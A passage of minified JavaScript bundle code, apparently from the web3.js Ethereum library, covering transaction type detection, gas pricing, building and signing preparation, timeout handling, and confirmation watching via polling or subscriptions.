                t.decodeSignedTransaction = function(e, t) {
                    return {
                        raw: (0, n.format)({
                            format: "bytes"
                        }, e, t),
                        tx: (0, s.formatTransaction)(Object.assign(Object.assign({}, i.TransactionFactory.fromSerializedData((0, n.hexToBytes)(e)).toJSON()), {
                            hash: (0, n.bytesToHex)((0, n.keccak256)((0, n.hexToBytes)(e))),
                            type: (0, o.detectRawTransactionType)((0, n.hexToBytes)(e))
                        }), t)
                    };
                };
            },
            7350: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.detectRawTransactionType = t.detectTransactionType = t.defaultTransactionTypeParser = void 0;
                const n = r(9634), i = r(9970), o = r(7345), s = r(5071), a = {
                    type: "object",
                    properties: {
                        accessList: {
                            type: "null"
                        },
                        maxFeePerGas: {
                            type: "null"
                        },
                        maxPriorityFeePerGas: {
                            type: "null"
                        }
                    }
                }, u = {
                    type: "object",
                    properties: {
                        maxFeePerGas: {
                            type: "null"
                        },
                        maxPriorityFeePerGas: {
                            type: "null"
                        }
                    }
                }, c = {
                    type: "object",
                    properties: {
                        gasPrice: {
                            type: "null"
                        }
                    }
                }, l = (e, t, r)=>{
                    try {
                        o.validator.validateJSONSchema(e, t);
                    } catch (e) {
                        if (e instanceof o.Web3ValidatorError) throw new s.InvalidPropertiesForTransactionTypeError(e.errors, r);
                        throw e;
                    }
                };
                t.defaultTransactionTypeParser = (e)=>{
                    var t, r;
                    const s = e;
                    if (!(0, o.isNullish)(s.type)) {
                        let e;
                        switch(s.type){
                            case "0x0":
                                e = a;
                                break;
                            case "0x1":
                                e = u;
                                break;
                            case "0x2":
                                e = c;
                                break;
                            default:
                                return (0, n.format)({
                                    format: "uint"
                                }, s.type, i.ETH_DATA_FORMAT);
                        }
                        return l(e, s, s.type), (0, n.format)({
                            format: "uint"
                        }, s.type, i.ETH_DATA_FORMAT);
                    }
                    if (!(0, o.isNullish)(s.maxFeePerGas) || !(0, o.isNullish)(s.maxPriorityFeePerGas)) return l(c, s, "0x2"), "0x2";
                    if (!(0, o.isNullish)(s.accessList)) return l(u, s, "0x1"), "0x1";
                    (0, o.isNullish)(s.gasPrice) || l(a, s, "0x0");
                    const d = null !== (t = s.hardfork) && void 0 !== t ? t : null === (r = s.common) || void 0 === r ? void 0 : r.hardfork;
                    if (void 0 === d) return;
                    const h = Object.keys(i.HardforksOrdered).indexOf(d);
                    return void 0 !== h ? h >= Object.keys(i.HardforksOrdered).indexOf("london") ? (0, o.isNullish)(s.gasPrice) ? "0x2" : "0x0" : h === Object.keys(i.HardforksOrdered).indexOf("berlin") ? "0x0" : void 0 : void 0;
                }, t.detectTransactionType = (e, r)=>{
                    var n;
                    return (null !== (n = null == r ? void 0 : r.transactionTypeParser) && void 0 !== n ? n : t.defaultTransactionTypeParser)(e);
                }, t.detectRawTransactionType = (e)=>e[0] > 127 ? "0x0" : (0, n.toHex)(e[0]);
            },
            5140: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.formatTransaction = void 0;
                const n = r(9970), i = r(7345), o = r(5071), s = r(9634), a = r(1922);
                t.formatTransaction = function(e, t = n.DEFAULT_RETURN_FORMAT, r = {
                    transactionSchema: a.transactionSchema
                }) {
                    var u;
                    let c = (0, s.mergeDeep)({}, e);
                    if ((0, i.isNullish)(null == e ? void 0 : e.common) || (c.common = Object.assign({}, e.common), (0, i.isNullish)(null === (u = e.common) || void 0 === u ? void 0 : u.customChain) || (c.common.customChain = Object.assign({}, e.common.customChain))), c = (0, s.format)(r.transactionSchema, c, t), (0, i.isNullish)(c.data)) (0, i.isNullish)(c.input) || (c.data = c.input);
                    else {
                        if (!(0, i.isNullish)(c.input) && c.data !== c.input) throw new o.TransactionDataAndInputError({
                            data: (0, s.bytesToHex)(c.data),
                            input: (0, s.bytesToHex)(c.input)
                        });
                        c.input = c.data;
                    }
                    return (0, i.isNullish)(c.gasLimit) || (c.gas = c.gasLimit, delete c.gasLimit), c;
                };
            },
            4429: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.getRevertReason = t.parseTransactionError = void 0;
                const i = r(5071), o = r(8381), s = r(9970), a = r(3222);
                t.parseTransactionError = (e, t)=>{
                    var r, n, s, a;
                    if (e instanceof i.ContractExecutionError && e.innerError instanceof i.Eip838ExecutionError) {
                        if (void 0 !== t) {
                            const i = t.filter((e)=>(0, o.isAbiErrorFragment)(e));
                            return (0, o.decodeContractErrorData)(i, e.innerError), {
                                reason: e.innerError.message,
                                signature: null === (r = e.innerError.data) || void 0 === r ? void 0 : r.slice(0, 10),
                                data: null === (n = e.innerError.data) || void 0 === n ? void 0 : n.substring(10),
                                customErrorName: e.innerError.errorName,
                                customErrorDecodedSignature: e.innerError.errorSignature,
                                customErrorArguments: e.innerError.errorArgs
                            };
                        }
                        return {
                            reason: e.innerError.message,
                            signature: null === (s = e.innerError.data) || void 0 === s ? void 0 : s.slice(0, 10),
                            data: null === (a = e.innerError.data) || void 0 === a ? void 0 : a.substring(10)
                        };
                    }
                    if (e instanceof i.InvalidResponseError && !Array.isArray(e.innerError) && void 0 !== e.innerError) return e.innerError.message;
                    throw e;
                }, t.getRevertReason = function(e, r, i, o = s.DEFAULT_RETURN_FORMAT) {
                    return n(this, void 0, void 0, function*() {
                        try {
                            return void (yield (0, a.call)(e, r, e.defaultBlock, o));
                        } catch (e) {
                            return (0, t.parseTransactionError)(e, i);
                        }
                    });
                };
            },
            1882: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.getTransactionError = void 0;
                const i = r(5071), o = r(4429);
                t.getTransactionError = function(e, t, r, s, a, u) {
                    return n(this, void 0, void 0, function*() {
                        let n, c = u;
                        if (void 0 === c && (void 0 !== s ? c = (0, o.parseTransactionError)(s) : e.handleRevert && void 0 !== t && (c = yield (0, o.getRevertReason)(e, t, a))), void 0 === c) n = new i.TransactionRevertedWithoutReasonError(r);
                        else if ("string" == typeof c) n = new i.TransactionRevertInstructionError(c, void 0, r);
                        else if (void 0 !== c.customErrorName && void 0 !== c.customErrorDecodedSignature && void 0 !== c.customErrorArguments) {
                            const e = c;
                            n = new i.TransactionRevertWithCustomError(e.reason, e.customErrorName, e.customErrorDecodedSignature, e.customErrorArguments, e.signature, r, e.data);
                        } else n = new i.TransactionRevertInstructionError(c.reason, c.signature, r, c.data);
                        return n;
                    });
                };
            },
            8736: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.getTransactionGasPricing = void 0;
                const i = r(7345), o = r(5071), s = r(9634), a = r(3222), u = r(223);
                t.getTransactionGasPricing = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        const c = (0, u.getTransactionType)(e, t);
                        if (!(0, i.isNullish)(c)) {
                            if (c.startsWith("-")) throw new o.UnsupportedTransactionTypeError(c);
                            if (c < "0x0" || c > "0x7f") throw new o.UnsupportedTransactionTypeError(c);
                            if ((0, i.isNullish)(e.gasPrice) && ("0x0" === c || "0x1" === c)) return {
                                gasPrice: yield (0, a.getGasPrice)(t, r),
                                maxPriorityFeePerGas: void 0,
                                maxFeePerGas: void 0
                            };
                            if ("0x2" === c) return Object.assign({
                                gasPrice: void 0
                            }, (yield function(e, t, r) {
                                var u, c, l;
                                return n(this, void 0, void 0, function*() {
                                    const n = yield (0, a.getBlock)(t, t.defaultBlock, !1, r);
                                    if ((0, i.isNullish)(n.baseFeePerGas)) throw new o.Eip1559NotSupportedError;
                                    if (!(0, i.isNullish)(e.gasPrice)) {
                                        const t = (0, s.format)({
                                            format: "uint"
                                        }, e.gasPrice, r);
                                        return {
                                            maxPriorityFeePerGas: t,
                                            maxFeePerGas: t
                                        };
                                    }
                                    return {
                                        maxPriorityFeePerGas: (0, s.format)({
                                            format: "uint"
                                        }, null !== (u = e.maxPriorityFeePerGas) && void 0 !== u ? u : t.defaultMaxPriorityFeePerGas, r),
                                        maxFeePerGas: (0, s.format)({
                                            format: "uint"
                                        }, null !== (c = e.maxFeePerGas) && void 0 !== c ? c : BigInt(n.baseFeePerGas) * BigInt(2) + BigInt(null !== (l = e.maxPriorityFeePerGas) && void 0 !== l ? l : t.defaultMaxPriorityFeePerGas), r)
                                    };
                                });
                            }(e, t, r)));
                        }
                    });
                };
            },
            1258: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.prepareTransactionForSigning = void 0;
                const i = r(9970), o = r(9634), s = r(9247), a = r(7345), u = r(8650), c = r(5140), l = r(223);
                t.prepareTransactionForSigning = (e, t, r, d = !1)=>n(void 0, void 0, void 0, function*() {
                        const n = yield (0, l.transactionBuilder)({
                            transaction: e,
                            web3Context: t,
                            privateKey: r,
                            fillGasPrice: d
                        }), h = (0, c.formatTransaction)(n, i.ETH_DATA_FORMAT);
                        return (0, u.validateTransactionForSigning)(h), s.TransactionFactory.fromTxData(((e)=>{
                            var t;
                            return {
                                nonce: e.nonce,
                                gasPrice: e.gasPrice,
                                gasLimit: null !== (t = e.gasLimit) && void 0 !== t ? t : e.gas,
                                to: e.to,
                                value: e.value,
                                data: e.input,
                                type: e.type,
                                chainId: e.chainId,
                                accessList: e.accessList,
                                maxPriorityFeePerGas: e.maxPriorityFeePerGas,
                                maxFeePerGas: e.maxFeePerGas
                            };
                        })(h), ((e, t)=>{
                            var r, n, i, u, c, l, d, h, f, p, m, g, y, v, b, E, A, _;
                            let w;
                            if (((0, a.isNullish)(e.chain) || (0, a.isNullish)(e.hardfork)) && (0, a.isNullish)(e.common)) t.defaultCommon ? (w = t.defaultCommon, (0, a.isNullish)(w.hardfork) && (w.hardfork = null !== (r = e.hardfork) && void 0 !== r ? r : t.defaultHardfork), (0, a.isNullish)(w.baseChain) && (w.baseChain = t.defaultChain)) : w = s.Common.custom({
                                name: "custom-network",
                                chainId: (0, o.toNumber)(e.chainId),
                                networkId: (0, a.isNullish)(e.networkId) ? void 0 : (0, o.toNumber)(e.networkId),
                                defaultHardfork: null !== (n = e.hardfork) && void 0 !== n ? n : t.defaultHardfork
                            }, {
                                baseChain: t.defaultChain
                            });
                            else {
                                const r = null !== (l = null !== (c = null === (u = null === (i = null == e ? void 0 : e.common) || void 0 === i ? void 0 : i.customChain) || void 0 === u ? void 0 : u.name) && void 0 !== c ? c : e.chain) && void 0 !== l ? l : "custom-network", n = (0, o.toNumber)(null !== (f = null === (h = null === (d = null == e ? void 0 : e.common) || void 0 === d ? void 0 : d.customChain) || void 0 === h ? void 0 : h.chainId) && void 0 !== f ? f : null == e ? void 0 : e.chainId), a = (0, o.toNumber)(null !== (g = null === (m = null === (p = null == e ? void 0 : e.common) || void 0 === p ? void 0 : p.customChain) || void 0 === m ? void 0 : m.networkId) && void 0 !== g ? g : null == e ? void 0 : e.networkId), T = null !== (b = null !== (v = null === (y = null == e ? void 0 : e.common) || void 0 === y ? void 0 : y.hardfork) && void 0 !== v ? v : null == e ? void 0 : e.hardfork) && void 0 !== b ? b : t.defaultHardfork, R = null !== (_ = null !== (A = null === (E = e.common) || void 0 === E ? void 0 : E.baseChain) && void 0 !== A ? A : e.chain) && void 0 !== _ ? _ : t.defaultChain;
                                n && a && r && (w = s.Common.custom({
                                    name: r,
                                    chainId: n,
                                    networkId: a,
                                    defaultHardfork: T
                                }, {
                                    baseChain: R
                                }));
                            }
                            return {
                                common: w
                            };
                        })(h, t));
                    });
            },
            4659: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.rejectIfBlockTimeout = void 0;
                const i = r(9634), o = r(5071), s = r(9326), a = r(3222);
                function u(e, t, r) {
                    const u = e.transactionPollingInterval, [c, l] = (0, i.rejectIfConditionAtInterval)(()=>n(this, void 0, void 0, function*() {
                            let n;
                            try {
                                n = yield (0, a.getBlockNumber)(e, s.NUMBER_DATA_FORMAT);
                            } catch (e) {
                                return void console.warn("An error happen while trying to get the block number", e);
                            }
                            const i = n - t;
                            if (i >= e.transactionBlockTimeout) return new o.TransactionBlockTimeoutError({
                                starterBlockNumber: t,
                                numberOfBlocks: i,
                                transactionHash: r
                            });
                        }), u);
                    return [
                        l,
                        {
                            clean: ()=>{
                                clearInterval(c);
                            }
                        }
                    ];
                }
                t.rejectIfBlockTimeout = function(e, t) {
                    var r, i;
                    return n(this, void 0, void 0, function*() {
                        const { provider: c } = e.requestManager;
                        let l;
                        const d = yield (0, a.getBlockNumber)(e, s.NUMBER_DATA_FORMAT);
                        return l = (null === (i = (r = c).supportsSubscriptions) || void 0 === i ? void 0 : i.call(r)) && e.enableExperimentalFeatures.useSubscriptionWhenCheckingBlockTimeout ? yield function(e, t, r) {
                            var i;
                            return n(this, void 0, void 0, function*() {
                                let n, s, a = !0;
                                function c(n, i) {
                                    i && console.warn("error happened at subscription. So revert to polling...", i), s.clean(), a = !1;
                                    const [o, c] = u(e, t, r);
                                    s.clean = c.clean, o.catch((e)=>n(e));
                                }
                                try {
                                    n = yield null === (i = e.subscriptionManager) || void 0 === i ? void 0 : i.subscribe("newHeads"), s = {
                                        clean: ()=>{
                                            var t;
                                            n.id && (null === (t = e.subscriptionManager) || void 0 === t || t.removeSubscription(n).then(()=>{}).catch(()=>{}));
                                        }
                                    };
                                } catch (n) {
                                    return u(e, t, r);
                                }
                                return [
                                    new Promise((i, s)=>{
                                        try {
                                            n.on("data", (n)=>{
                                                if (a = !1, !(null == n ? void 0 : n.number)) return;
                                                const i = Number(BigInt(n.number) - BigInt(t));
                                                i >= e.transactionBlockTimeout && s(new o.TransactionBlockTimeoutError({
                                                    starterBlockNumber: t,
                                                    numberOfBlocks: i,
                                                    transactionHash: r
                                                }));
                                            }), n.on("error", (e)=>{
                                                c(s, e);
                                            });
                                        } catch (e) {
                                            c(s, e);
                                        }
                                        setTimeout(()=>{
                                            a && c(s);
                                        }, 1e3 * e.blockHeaderTimeout);
                                    }),
                                    s
                                ];
                            });
                        }(e, d, t) : u(e, d, t), l;
                    });
                };
            },
            223: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.transactionBuilder = t.defaultTransactionBuilder = t.getTransactionType = t.getTransactionNonce = t.getTransactionFromOrToAttr = void 0;
                const i = r(9970), o = r(9247), s = r(9820), a = r(7345), u = r(5071), c = r(9634), l = r(9326), d = r(3222), h = r(7350), f = r(1922), p = r(8736);
                function m(e) {
                    var r, o;
                    return n(this, void 0, void 0, function*() {
                        let n = (0, c.format)(f.transactionSchema, e.transaction, i.DEFAULT_RETURN_FORMAT);
                        if ((0, a.isNullish)(n.from) && (n.from = (0, t.getTransactionFromOrToAttr)("from", e.web3Context, void 0, e.privateKey)), (0, a.isNullish)(n.nonce) && (n.nonce = yield (0, t.getTransactionNonce)(e.web3Context, n.from, i.ETH_DATA_FORMAT)), (0, a.isNullish)(n.value) && (n.value = "0x"), (0, a.isNullish)(n.data)) (0, a.isNullish)(n.input) ? (n.input = "0x", n.data = "0x") : (n.input.startsWith("0x") || (n.input = `0x${n.input}`), n.data = n.input);
                        else {
                            if (!(0, a.isNullish)(n.input) && n.data !== n.input) throw new u.TransactionDataAndInputError({
                                data: (0, c.bytesToHex)(n.data),
                                input: (0, c.bytesToHex)(n.input)
                            });
                            n.data.startsWith("0x") || (n.data = `0x${n.data}`), n.input = n.data;
                        }
                        if ((0, a.isNullish)(n.common)) {
                            if (e.web3Context.defaultCommon) {
                                const t = e.web3Context.defaultCommon, r = t.customChain.chainId, i = t.customChain.networkId, o = t.customChain.name;
                                n.common = Object.assign(Object.assign({}, t), {
                                    customChain: {
                                        chainId: r,
                                        networkId: i,
                                        name: o
                                    }
                                });
                            }
                            (0, a.isNullish)(n.chain) && (n.chain = e.web3Context.defaultChain), (0, a.isNullish)(n.hardfork) && (n.hardfork = e.web3Context.defaultHardfork);
                        }
                        return (0, a.isNullish)(n.chainId) && (0, a.isNullish)(null === (r = n.common) || void 0 === r ? void 0 : r.customChain.chainId) && (n.chainId = yield (0, d.getChainId)(e.web3Context, i.ETH_DATA_FORMAT)), (0, a.isNullish)(n.networkId) && (n.networkId = null !== (o = e.web3Context.defaultNetworkId) && void 0 !== o ? o : yield (0, s.getId)(e.web3Context, i.ETH_DATA_FORMAT)), (0, a.isNullish)(n.gasLimit) && !(0, a.isNullish)(n.gas) && (n.gasLimit = n.gas), n.type = (0, t.getTransactionType)(n, e.web3Context), !(0, a.isNullish)(n.accessList) || "0x1" !== n.type && "0x2" !== n.type || (n.accessList = []), e.fillGasPrice && (n = Object.assign(Object.assign({}, n), (yield (0, p.getTransactionGasPricing)(n, e.web3Context, i.ETH_DATA_FORMAT)))), n;
                    });
                }
                t.getTransactionFromOrToAttr = (e, t, r, n)=>{
                    if (void 0 !== r && e in r && void 0 !== r[e]) {
                        if ("string" == typeof r[e] && (0, a.isAddress)(r[e])) return r[e];
                        if (!(0, a.isHexStrict)(r[e]) && (0, a.isNumber)(r[e])) {
                            if (t.wallet) {
                                const n = t.wallet.get((0, c.format)({
                                    format: "uint"
                                }, r[e], l.NUMBER_DATA_FORMAT));
                                if (!(0, a.isNullish)(n)) return n.address;
                                throw new u.LocalWalletNotAvailableError;
                            }
                            throw new u.LocalWalletNotAvailableError;
                        }
                        throw "from" === e ? new u.InvalidTransactionWithSender(r.from) : new u.InvalidTransactionWithReceiver(r.to);
                    }
                    if ("from" === e) {
                        if (!(0, a.isNullish)(n)) return (0, o.privateKeyToAddress)(n);
                        if (!(0, a.isNullish)(t.defaultAccount)) return t.defaultAccount;
                    }
                }, t.getTransactionNonce = (e, t, r = i.DEFAULT_RETURN_FORMAT)=>n(void 0, void 0, void 0, function*() {
                        if ((0, a.isNullish)(t)) throw new u.UnableToPopulateNonceError;
                        return (0, d.getTransactionCount)(e, t, e.defaultBlock, r);
                    }), t.getTransactionType = (e, t)=>{
                    const r = (0, h.detectTransactionType)(e, t);
                    return (0, a.isNullish)(r) ? (0, a.isNullish)(t.defaultTransactionType) ? void 0 : (0, c.format)({
                        format: "uint"
                    }, t.defaultTransactionType, i.ETH_DATA_FORMAT) : r;
                }, t.defaultTransactionBuilder = m, t.transactionBuilder = (e)=>n(void 0, void 0, void 0, function*() {
                        var t;
                        return (null !== (t = e.web3Context.transactionBuilder) && void 0 !== t ? t : m)(Object.assign(Object.assign({}, e), {
                            transaction: e.transaction
                        }));
                    });
            },
            8425: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.trySendTransaction = void 0;
                const i = r(9634), o = r(5071), s = r(4659);
                t.trySendTransaction = function(e, t, r) {
                    return n(this, void 0, void 0, function*() {
                        const [n, a] = (0, i.rejectIfTimeout)(e.transactionSendTimeout, new o.TransactionSendTimeoutError({
                            numberOfSeconds: e.transactionSendTimeout / 1e3,
                            transactionHash: r
                        })), [u, c] = yield (0, s.rejectIfBlockTimeout)(e, r);
                        try {
                            return yield Promise.race([
                                t(),
                                a,
                                u
                            ]);
                        } finally{
                            clearTimeout(n), c.clean();
                        }
                    });
                };
            },
            4745: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.waitForTransactionReceipt = void 0;
                const i = r(5071), o = r(9634), s = r(4659), a = r(3222);
                t.waitForTransactionReceipt = function(e, t, r) {
                    var u;
                    return n(this, void 0, void 0, function*() {
                        const c = null !== (u = e.transactionReceiptPollingInterval) && void 0 !== u ? u : e.transactionPollingInterval, l = (0, o.pollTillDefined)(()=>n(this, void 0, void 0, function*() {
                                try {
                                    return (0, a.getTransactionReceipt)(e, t, r);
                                } catch (e) {
                                    return void console.warn("An error happen while trying to get the transaction receipt", e);
                                }
                            }), c), [d, h] = (0, o.rejectIfTimeout)(e.transactionPollingTimeout, new i.TransactionPollingTimeoutError({
                            numberOfSeconds: e.transactionPollingTimeout / 1e3,
                            transactionHash: t
                        })), [f, p] = yield (0, s.rejectIfBlockTimeout)(e, t);
                        try {
                            return yield Promise.race([
                                l,
                                h,
                                f
                            ]);
                        } finally{
                            clearTimeout(d), p.clean();
                        }
                    });
                };
            },
            8002: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.watchTransactionByPolling = void 0;
                const i = r(9634), o = r(1181), s = r(1922);
                t.watchTransactionByPolling = ({ web3Context: e, transactionReceipt: t, transactionPromiEvent: r, returnFormat: a })=>{
                    var u;
                    let c = 1;
                    const l = setInterval(()=>{
                        n(void 0, void 0, void 0, function*() {
                            c >= e.transactionConfirmationBlocks && clearInterval(l);
                            const n = yield o.ethRpcMethods.getBlockByNumber(e.requestManager, (0, i.numberToHex)(BigInt(t.blockNumber) + BigInt(c)), !1);
                            (null == n ? void 0 : n.hash) && (c += 1, r.emit("confirmation", {
                                confirmations: (0, i.format)({
                                    format: "uint"
                                }, c, a),
                                receipt: (0, i.format)(s.transactionReceiptSchema, t, a),
                                latestBlockHash: (0, i.format)({
                                    format: "bytes32"
                                }, n.hash, a)
                            }));
                        });
                    }, null !== (u = e.transactionReceiptPollingInterval) && void 0 !== u ? u : e.transactionPollingInterval);
                };
            },
            2539: function(e, t, r) {
                "use strict";
                var n = this && this.__awaiter || function(e, t, r, n) {
                    return new (r || (r = Promise))(function(i, o) {
                        function s(e) {
                            try {
                                u(n.next(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function a(e) {
                            try {
                                u(n.throw(e));
                            } catch (e) {
                                o(e);
                            }
                        }
                        function u(e) {
                            var t;
                            e.done ? i(e.value) : (t = e.value, t instanceof r ? t : new r(function(e) {
                                e(t);
                            })).then(s, a);
                        }
                        u((n = n.apply(e, t || [])).next());
                    });
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.watchTransactionBySubscription = void 0;
                const i = r(9634), o = r(1922), s = r(8002);
                t.watchTransactionBySubscription = ({ web3Context: e, transactionReceipt: t, transactionPromiEvent: r, returnFormat: a })=>{
                    let u, c = !0;
                    setImmediate(()=>{
                        var l;
                        null === (l = e.subscriptionManager) || void 0 === l || l.subscribe("newHeads").then((l)=>{
                            l.on("data", (s)=>n(void 0, void 0, void 0, function*() {
                                    var n;
                                    if (c = !1, !(null == s ? void 0 : s.number) || u === (null == s ? void 0 : s.parentHash)) return;
                                    u = null == s ? void 0 : s.parentHash;
                                    const d = BigInt(s.number) - BigInt(t.blockNumber) + BigInt(1);
                                    r.emit("confirmation", {
                                        confirmations: (0, i.format)({
                                            format: "uint"
                                        }, d, a),
                                        receipt: (0, i.format)(o.transactionReceiptSchema, t, a),
                                        latestBlockHash: (0, i.format)({
                                            format: "bytes32"
                                        }, s.parentHash, a)
                                    }), d >= e.transactionConfirmationBlocks && (yield null === (n = e.subscriptionManager) || void 0 === n ? void 0 : n.removeSubscription(l));
                                })), l.on("error", ()=>n(void 0, void 0, void 0, function*() {
                                    var n;
                                    yield null === (n = e.subscriptionManager) || void 0 === n ? void 0 : n.removeSubscription(l), c = !1, (0, s.watchTransactionByPolling)({
                                        web3Context: e,
                                        transactionReceipt: t,
                                        transactionPromiEvent: r,
                                        returnFormat: a
                                    });
                                }));
                        }).catch(()=>{
                            c = !1, (0, s.watchTransactionByPolling)({
                                web3Context: e,
                                transactionReceipt: t,
                                transactionPromiEvent: r,
                                returnFormat: a
                            });
                        });
                    }), setTimeout(()=>{
                        c && (0, s.watchTransactionByPolling)({
                            web3Context: e,
                            transactionReceipt: t,
                            transactionPromiEvent: r,
                            returnFormat: a
                        });
                    }, 1e3 * e.blockHeaderTimeout);
                };
            },
            2117: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.watchTransactionForConfirmations = void 0;
                const n = r(9634), i = r(7345), o = r(5071), s = r(1922), a = r(8002), u = r(2539);
                t.watchTransactionForConfirmations = function(e, t, r, c, l) {
                    if ((0, i.isNullish)(r) || (0, i.isNullish)(r.blockHash)) throw new o.TransactionMissingReceiptOrBlockHashError({
                        receipt: r,
                        blockHash: (0, n.format)({
                            format: "bytes32"
                        }, null == r ? void 0 : r.blockHash, l),
                        transactionHash: (0, n.format)({
                            format: "bytes32"
                        }, c, l)
                    });
                    if (!r.blockNumber) throw new o.TransactionReceiptMissingBlockNumberError({
                        receipt: r
                    });
                    t.emit("confirmation", {
                        confirmations: (0, n.format)({
                            format: "uint"
                        }, 1, l),
                        receipt: (0, n.format)(s.transactionReceiptSchema, r, l),
                        latestBlockHash: (0, n.format)({
                            format: "bytes32"
                        }, r.blockHash, l)
                    }), e.requestManager.provider.supportsSubscriptions() ? (0, u.watchTransactionBySubscription)({
                        web3Context: e,
                        transactionReceipt: r,
                        transactionPromiEvent: t,
                        returnFormat: l
                    }) : (0, a.watchTransactionByPolling)({
                        web3Context: e,
                        transactionReceipt: r,
                        transactionPromiEvent: t,
                        returnFormat: l
                    });
                };
            },
            8650: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
